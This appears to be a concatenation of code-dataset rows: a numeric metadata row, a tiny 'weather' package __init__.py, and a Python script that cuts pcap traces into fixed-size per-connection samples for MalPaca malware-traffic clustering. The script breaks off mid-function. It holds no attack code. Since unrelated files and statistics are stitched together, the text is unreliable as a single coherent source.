| 36.759305 | 92 | 0.617141 | 5,072 | 44,442 | 5.144716 | 0.054811 | 0.035257 | 0.038323 | 0.019391 | 0.87637 | 0.83981 | 0.826703 | 0.818349 | 0.810416 | 0.804399 | 0 | 0.003767 | 0.277215 | 44,442 | 1,208 | 93 | 36.789735 | 0.808574 | 0.034224 | 0 | 0.798514 | 0 | 0.009285 | 0.118263 | 0.003103 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054782 | false | 0.001857 | 0.02507 | 0.003714 | 0.100279 | 0.020427 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
279f0863b88b2c765c55e311ec337762078a47d5 | 93 | py | Python | weather/__init__.py | LorenzoBunino/weather | e8c3a54d5ab6e1ce5f385e610f1e7efd2f1a6b78 | ["MIT"] | null | null | null | weather/__init__.py | LorenzoBunino/weather | e8c3a54d5ab6e1ce5f385e610f1e7efd2f1a6b78 | ["MIT"] | 2 | 2021-12-22T21:17:45.000Z | 2021-12-22T22:28:55.000Z | weather/__init__.py | LorenzoBunino/weather | e8c3a54d5ab6e1ce5f385e610f1e7efd2f1a6b78 | ["MIT"] | 2 | 2021-12-22T21:08:21.000Z | 2021-12-22T21:16:57.000Z |
from weather import WeatherDay
from weather import WeatherMonth
from weather import __main__
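# Importing the package therefore loads its WeatherDay, WeatherMonth and
# __main__ submodules and exposes them as attributes of 'weather'.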
| 23.25 | 32 | 0.870968 | 12 | 93 | 6.416667 | 0.5 | 0.428571 | 0.662338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 93 | 3 | 33 | 31 | 0.950617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
27bac5a1a991c60b13bc850aad5a8dbe9d1c7dcb | 52064 | py | Python | scripts/for_malpaca_preparation/for_malpaca_preparation_netflow.py | mrjojo11/malpaca-pub | 26fd3a7045288bed66d624e0f5593067ff05952d | ["MIT"] | null | null | null | scripts/for_malpaca_preparation/for_malpaca_preparation_netflow.py | mrjojo11/malpaca-pub | 26fd3a7045288bed66d624e0f5593067ff05952d | ["MIT"] | null | null | null | scripts/for_malpaca_preparation/for_malpaca_preparation_netflow.py | mrjojo11/malpaca-pub | 26fd3a7045288bed66d624e0f5593067ff05952d | ["MIT"] | null | null | null |
import csv
import glob
import math
import os
import socket
import sys
from random import random, seed
from timeit import default_timer as timer
import time
from statistics import mean
from pathlib import Path
import networkx as nx
import numpy as np
from scapy.layers.inet import IP, UDP
from scapy.utils import PcapWriter, PcapReader
import tkinter as tk
from tkinter import filedialog
import zat
from zat.log_to_dataframe import LogToDataFrame
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
from matplotlib.pyplot import cm
import matplotlib.transforms as mtrans
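# For_Malpaca_Preparation_Netflow cuts filtered pcap traces into fixed-size
# per-connection samples for MalPaca, with a connection identified by the
# netflow 5-tuple (src_ip, dst_ip, ip_protocol, src_port, dst_port). The
# static methods below implement six sampling strategies: the first N
# packets, the first N after skipping X, N packets ending X before the end,
# the last N, consecutive fixed-size windows, and X equal parts spread
# across the connection. Each method also rewrites the per-connection
# summary csv so it matches the pcap it emits.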
class For_Malpaca_Preparation_Netflow():
@staticmethod
def get_data_equal_to_fixed_threshold_for_malpaca_enriched(threshold, folder_to_filtered_files,
folder_to_move_data_to, old_file_addition):
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(threshold)) + "_fixed_threshold"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
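# packet.show(dump=True) renders each layer as a '###[ Layer ]###' header
# followed by 'field = value' lines; the loop below rebuilds that text into
# a nested dict so the 5-tuple can be read out, and packets are then grouped
# per connection in file_packet_dic. Non-numeric service names are mapped
# back to numeric ports via socket.getservbyname where possible; ICMP
# connections use 'type/code' as a pseudo destination port. (The same
# parsing block is repeated in every method of this class.)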
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int):
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
src_ip = str(src_ip.strip())
dst_ip = str(dst_ip.strip())
ip_protocol = str(ip_protocol.strip())
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_skip_x_then_take_fixed_threshold_for_malpaca_enriched(skip, threshold, folder_to_filtered_files,
folder_to_move_data_to, old_file_addition):
skip = int(skip)
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + str(threshold) + "_fixed_threshold_" + str(skip) + "_skip"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int):
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for address, packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append(address)
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if (index > skip):
if (index <= (skip + threshold)):
pktdump.write(packet)
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if (index > skip):
if (index <= (skip + threshold)):
pktdump.write(packet)
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_skip_x_then_take_fixed_threshold_from_end_for_malpaca_enriched(skip, threshold,
folder_to_filtered_files,
folder_to_move_data_to,
old_file_addition):
skip = int(skip)
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(threshold)) + "_fixed_threshold_" + str(
skip) + "_skip_from_end"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int):
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for address, packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append(address)
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = (threshold + skip) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= (threshold + skip):
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = (threshold + skip) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_equal_to_fixed_threshold_from_end_for_malpaca_enriched(threshold, folder_to_filtered_files,
folder_to_move_data_to, old_file_addition):
threshold = int(threshold)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(threshold)) + "_fixed_threshold_from_end"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
connections_used = []
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
write_count = 1
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int):
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
if (packet_count % 500000) == 0:
if packet_count != 0:
print("Write " + str(write_count) + " Start")
for address, packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append(address)
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = int(threshold) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write " + str(write_count) + " End")
write_count = write_count + 1
packets.close()
if len(file_packet_dic) > 0:
print("Write Last Packets Start")
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount = len(packets_value)
if amount >= threshold:
connections_used.append((src_ip, dst_ip, ip_protocol, src_port, dst_port))
pktdump = PcapWriter(new_file_path, append=True, sync=True)
threshold_int = int(threshold) * (-1)
packets_value = packets_value[threshold_int:]
for index, packet in enumerate(packets_value):
if index < threshold:
pktdump.write(packet)
else:
break
pktdump.close()
file_packet_dic.clear()
print("Write Last Packets End")
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(connections_used) > 0:
for index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
if index == 0:
combined_df = row
else:
combined_df = combined_df.append(row)
file_packet_dic.clear()
connections_used.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df["connection_length"] = threshold
combined_df.to_csv(new_csv_file_path, index=False)
file_packet_dic.clear()
connections_used.clear()
@staticmethod
def get_data_equal_to_fixed_window_size_for_malpaca(folder_to_filtered_files, folder_to_move_data_to, window_size, old_file_addition):
window_size = int(window_size)
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
new_folder_path = folder_to_move_data_to + "/" + (str(window_size)) + "_window_size"
os.mkdir(new_folder_path)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
file_packet_dic = {}
window_dic = {}
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int):
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
new_file_path = new_folder_path + "/" + scenario_name + "_" + file_name
for (src_ip, dst_ip, ip_protocol, src_port, dst_port), packets_value in file_packet_dic.items():
amount_packets = len(packets_value)
